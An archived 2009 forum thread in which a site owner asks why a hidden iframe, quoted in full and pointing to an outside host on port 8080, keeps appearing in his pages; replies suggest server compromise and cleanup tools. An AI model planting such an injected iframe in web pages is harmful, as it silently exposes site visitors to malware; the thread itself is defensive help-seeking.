...

View Full Version : is this a hacker of sorts? (security issues)



alduhkneel
07-27-2009, 02:12 AM
lately this has been embedding itself into a number of pages (cutting off original coding and therefore disrupting the page):
<iframe src="http://xg8.in:8080/index.php" width=158 height=197 style="visibility: hidden"></iframe>

i'm going to change the cpanel and ftp passwords but i have no clue what the heck this is. all my googling returns results in foreign languages, but i do spy the word "malware." any help is appreciated!

_Aerospace_Eng_
07-27-2009, 02:58 AM
It could also be that your server is compromised or you have some server side code that has some vulnerabilities. Do you have any code that allows user uploads?

alduhkneel
07-27-2009, 06:12 AM
nope, no such coding (i'm pretty sure). you can check out the site here:
http://blank-label.com
if the server's been compromised, do you think resetting passwords and such will solve it or is there any other action i can do to fix it?
edit actually, now that i think about it, could someone be going through the contact form? it seems a little far fetched because the inserted code has been on various pages, mostly unrelated to the contact page, so i'm not sure how a person could manage to post the code in such varied locations.

_Aerospace_Eng_
07-27-2009, 08:39 AM
From what I've been reading it seems that your system might be compromised.

http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/

I know its not a .cn domain but the author says it applies to other domains too. Read the how to clean up part.

The free version of Malwarebytes Anti-Malware should find the problem if there is one:
http://www.malwarebytes.org/mbam.php

alduhkneel
07-28-2009, 08:20 PM
thanks for the help; hopefully this will solve it. :]



EZ Archive Ads Plugin for vBulletin Copyright 2006 Computer Help Forum